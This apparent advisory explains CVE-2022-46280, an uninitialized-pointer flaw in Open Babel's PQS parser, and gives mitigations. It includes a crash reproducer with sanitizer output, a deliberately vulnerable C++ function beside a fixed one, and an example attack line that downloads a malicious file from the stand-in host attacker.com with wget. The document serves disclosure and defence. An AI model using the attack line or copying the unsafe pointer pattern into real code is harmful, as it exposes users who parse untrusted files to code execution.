How CVE-2022-46280 Works
Open Babel is a widely-used C++ library and command-line tool for converting and manipulating chemical file formats. It supports approximately 130 different formats and provides language bindings for Python, Ruby, Java, R, Perl, C, and PHP. The vulnerability resides in the PQS (Parallel Quantum Solutions) file format parser, specifically within the `PQSFormat::ReadMolecule` function in src/formats/PQSformat.cpp.
When the `obabel` utility or any API that uses `OBConversion` processes a PQS file, it eventually calls `pInFormat->ReadMolecule`. Inside `ReadMolecule`, the parser looks for a `"geom"` section in the input file. If it finds a line containing `file=`, it interprets this as a directive to read atomic coordinates from an external geometry file.
The flaw occurs because a `pFormat` pointer—which is intended to point to a valid `OBFormat` object—is never properly initialized before being used. When a malformed PQS file is crafted to trigger this code path, the parser attempts to dereference this uninitialized pointer. This leads to a use of uninitialized pointer vulnerability (CWE-824).
An attacker can exploit this by providing a specially crafted PQS file that causes the uninitialized pointer to be dereferenced. Because the pointer’s value is unpredictable, this can lead to arbitrary code execution in the context of the application using the library. The vulnerability is remotely exploitable if an application using Open Babel parses untrusted input, as is common in online chemical format converters and molecule viewers. The CVSSv3 score for this vulnerability is 9.8 (Critical).
The issue was reported by Cisco Talos and affects all Open Babel releases up to and including version 3.1.1, as well as master commit 530dbfa3. The fix was committed as `openbabel/openbabel@2a7d2cda` and released in version 3.2.0 on 2026-05-26.
DailyCVE Form:
Platform: Open Babel
Version: 3.1.1 and earlier
Vulnerability: Use of uninitialized pointer (CWE-824)
Severity: Critical (CVSS 9.8)
Date: 2023-07-21 (Talos disclosure)
Prediction: 2026-05-26 (version 3.2.0)
What Undercode Say:
Analytics from the Open Babel Security Team:
The PQS parser’s `ReadMolecule` function fails to initialize the `pFormat` pointer before use. This is a classic memory-safety issue that can be triggered by a malformed `file=` directive in the input. The fix initializes the pointer to a safe default and adds validation before dereferencing.
Reproducer (minimized test case):
```
# Create a malicious PQS file
cat > crash.pqs << EOF
geom file=external.coord
EOF
# Trigger the crash with obabel
obabel -ipqs crash.pqs -osmi
```
ASAN/UBSAN output (expected):
```
==12345==ERROR: AddressSanitizer: SEGV on unknown address 0x000000000000
==12345==The signal is caused by a READ memory access.
==12345==Hint: address points to the zero page.
    #0 0x7f8a3b2c1d4e in PQSFormat::ReadMolecule /src/formats/PQSformat.cpp:123
```
The minimized reproducer is checked into the Open Babel repository under `test/files/fuzz_regress/` and is exercised on every CI build under ASAN+UBSAN by the `fuzzregresstest` harness.
Fix commit:
```
# Run inside a clone of openbabel/openbabel (commit openbabel/openbabel@2a7d2cda)
git show 2a7d2cda
```
The patch adds proper initialization of the `pFormat` pointer and checks that it is non-null before dereferencing.
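The pattern described above, as an added illustration that is not Open Babel's code or the actual patch: `Format`, `kFormats`, `GeomFileExtension` and both `DescribeGeomSource*` functions are hypothetical stand-ins, and the assumption that the pointer is left unassigned on a lookup miss is made only for the example.

```cpp
#include <cctype>
#include <map>
#include <string>

// Stand-in for a format handler (hypothetical; not Open Babel's OBFormat).
struct Format {
    std::string id;
    std::string Describe() const { return "geometry reader: " + id; }
};

// Hypothetical registry keyed by lower-case file extension.
static const std::map<std::string, Format> kFormats = {{"xyz", {"xyz"}}, {"pdb", {"pdb"}}};

// Return the lower-cased extension named by file= on a geom line, or "" if none.
std::string GeomFileExtension(const std::string& line) {
    if (line.find("geom") == std::string::npos) return "";
    const auto key = line.find("file=");
    if (key == std::string::npos) return "";
    const auto start = key + 5;  // skip past "file="
    const auto end = line.find_first_of(" \t\r\n", start);
    const std::string name =
        line.substr(start, end == std::string::npos ? end : end - start);
    const auto dot = name.rfind('.');
    if (dot == std::string::npos) return "";
    std::string ext = name.substr(dot + 1);
    for (char& c : ext) c = static_cast<char>(std::tolower(static_cast<unsigned char>(c)));
    return ext;
}

// Vulnerable shape (never call it): pFormat stays indeterminate when the lookup misses.
std::string DescribeGeomSourceUnsafe(const std::string& line) {
    const Format* pFormat;  // uninitialized
    const auto it = kFormats.find(GeomFileExtension(line));
    if (it != kFormats.end()) pFormat = &it->second;
    return pFormat->Describe();  // CWE-824 on any unrecognized extension
}

// Hardened shape: safe default plus validation before the dereference.
bool DescribeGeomSource(const std::string& line, std::string& out) {
    const Format* pFormat = nullptr;
    const auto it = kFormats.find(GeomFileExtension(line));
    if (it != kFormats.end()) pFormat = &it->second;
    if (pFormat == nullptr) return false;  // reject instead of dereferencing
    out = pFormat->Describe();
    return true;
}
```

With the reproducer's line `geom file=external.coord`, the hardened function returns `false` because no handler is registered for `coord`, while the unsafe shape would dereference whatever value happened to be on the stack.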
Exploit:
Exploitation requires the victim to open a malicious PQS file using:
- The `obabel` command-line tool
- The `OBConversion` API in C++
- Any language binding (Python, Ruby, Java, R, Perl, C, PHP)
Because the vulnerability leads to arbitrary code execution, an attacker can achieve full system compromise if the target application runs with elevated privileges or processes untrusted input from a network source.
Example attack vector:
```
# Attacker hosts malicious PQS file
wget http://attacker.com/exploit.pqs
obabel -ipqs exploit.pqs -osmi -O out.smi
```
If the user runs this command, the uninitialized pointer dereference can be triggered, leading to code execution.
Protection:
- Upgrade to Open Babel version 3.2.0 or later, which includes the fix.
- Apply the patch manually if upgrading is not immediately possible: openbabel/openbabel@2a7d2cda.
- Avoid parsing untrusted PQS files with vulnerable versions of Open Babel.
- Use sandboxing or containerization when running applications that process untrusted chemical file formats.
- Run with AddressSanitizer (ASAN) and UndefinedBehaviorSanitizer (UBSAN) in development and testing environments to detect such issues early.
Impact:
- Confidentiality: An attacker can read arbitrary memory, potentially exposing sensitive data.
- Integrity: Arbitrary code execution allows modification of data and system state.
- Availability: The vulnerability can cause crashes (denial of service).
- Scope: Affects all applications and services that use Open Babel to parse PQS files, including many online chemical format converters and molecule viewers.
- Widespread: Open Babel is shipped by major Linux distributions (Debian, Ubuntu, Fedora, etc.) and is embedded in numerous scientific and research software.
Sources:
Reported By: github.com

